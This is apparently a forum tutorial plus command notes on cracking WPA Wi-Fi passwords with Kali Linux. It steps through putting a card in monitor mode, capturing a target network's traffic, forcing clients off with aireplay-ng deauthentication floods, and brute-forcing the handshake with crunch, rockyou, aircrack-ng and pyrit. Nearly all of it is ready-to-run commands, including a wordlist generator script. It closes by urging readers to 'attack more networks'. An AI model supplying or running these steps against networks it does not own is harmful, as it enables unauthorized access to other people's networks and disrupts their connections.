Kali Wifi Cracking & Hacking Example

Capture a handshake and crack it, with crunch and how to use it on Chromebook


Kali:

1- First thing to do is get your wireless card in to mon0 for capture and injection. Its not vital to do this but it speeds up the attack and its used if your are already connected to a network.

Open up a terminal and type:

Code:

 sudo airmon-ng start wlan0

then hit enter

2 - It will list your wireless card and show you the mon0 is active. It has now created a virtual wireless card. Now you need to scan for the network you want to attack and capture a handshake, a handshake is the data exchange between a client (network user) and the router (the network access point, also called the 'AP').

To start scanning type:

Code:

 sudo airodump-ng mon0

then hit enter

3 - It will now scan and show you networks around you and their information like mac address, power, traffic, channel and clients. Once you have scanned and identified the target AP, hold down the buttons CTRL + C and this will cancel the running script, now you can tell the wireless card to only capture data packets from this network.

To capture the data type:

Code:

 sudo airodump-ng --bssid xx:xx:xx:xx:xx -c (channel) -w (output file name) mon0

then hit enter

4 - It will now capture that data to the 'output file name', this will be stored in the HOME folder but do not move the file, rename or delete it. They will be 5 files created with the same name but different formats. They are all the same information but for different uses. The file we are interested in is the 'output-file-name.cap' file. Now would be a good time to try and capture that handshake in order to retrieve to the network password.

To capture the handshake open up a new terminal and type:

Code:

 sudo aireplay-ng -0 10 -a (target mac address) mon0

then hit enter

With clients:

Code:

 sudo aireplay-ng -0 10 -a (target mac address) -c (clients mac address) mon0

then hit enter

5 - It will now send 10 deauthentication requests to the AP and request all Clients to reconnect. With clients is more effective but takes longer to type. Airodump-ng will now try and capture the handshakes in process. Once it is captured (may take 20 minutes) you can now crack it, hold down CTRL + C to stop airodump capturing data.

To crack the handshake using crunch type:

Code:

 crunch 8 12 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -a 2 -b (target mac address) -w- (output file name).cap

then hit enter

With a dictionary type:

Code:

 aircrack-ng -a 2 -b (target mac address) -w (dictionary name and path) (output file name).cap

then hit enter

6. Now sit back and have a nap, this could take a few hours


To crack using pyrit use the above steps 2, 3 and 4 to capture the handshake.

To crack with pyrit type:

Code:


 crunch 8 12 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r (output
file name).cap -b (target mac address) -i - attack_passthrough

then hit enter

With dictionary:

Code:

 pyrit -r (output file name).cap -b (target mac address) -i (dictionary file and path) (choose your attack mode)

then hit enter


Wifi Metropolis 3:

To capture a handshake and crack it with 'Wifi Metropolis 3' you just follow the on screen GUI.



Thank you for reading and i hope this helps you and encourages you to attack more networks and improve security on your home network.

Manually Cracking Handshakes

sudo airmon-ng check kill !Start monitor mode sudo airmon-ng start wlan0 !Verify that monitor mode is used sudo airmon-ng !You could also use iwconfig to check that interface is in monitor mode: iwconfig ! Get the AP's MAC address and channel sudo airodump-ng wlan0mon ! AP-MAC & channel - you need to select your own here: ESSID: 90:9A:4A:B8:F3:FB Channel used by AP for SSID: 2 !1st Window: !Make sure you replace the channel number and bssid with your own !Replace hack1 with your file name like capture1 or something sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon !2nd Window - deauth attack !Make sure you replace the bssid with your own sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon !Use Wireshark to open hack file wireshark hack1-01.cap


!Filter Wireshark messages for EAPOL eapol

!Stop monitor mode



sudo airmon-ng stop wlan0mon



!Crack file with Rock you or another wordlist
!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack1-01.cap with your file name aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt

Code:

crunch  8  8  ABCDEFGHIJKLMNOPQRSTUVWXYZ  -t  @@@@@@@@  |  perl -ne 'print unless /([A-Z]).*\1/' | aircrack-ng  --bssid  00:11:22:33:44:55  -w-  UPC925.cap

or

Code:

crunch  8  8  ABCDEFGHIJKLMNOPQRSTUVWXYZ  -t  @@@@@@@@  | perl -ne 'print unless /([A-Z]).*\1/' > wordlist.txt

These examples show how to remove duplicate chars from a code!

Example generator.sh

Code:

#!/bin/bash
echo "Generating Wifi Keys File List"

crunch 12 12 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890 -t @@@@@@@@@@@@ | perl -ne        'print unless /([A-Z]).*\1/' > wordlists/wifi_wordlist.txt

# online gen https://makemeapassword.ligos.net/Generate/AlphaNumeric

# ~/Documents/Scripts/Fern-Wifi-Cracker


# cat wordlists/list.txt | perl -ne 'print unless /([A-Z]).*\1/' > wordlists/new_wordlist.txt



More on Crunch

hackingarticles.in/a-detailed-guide-on-crunch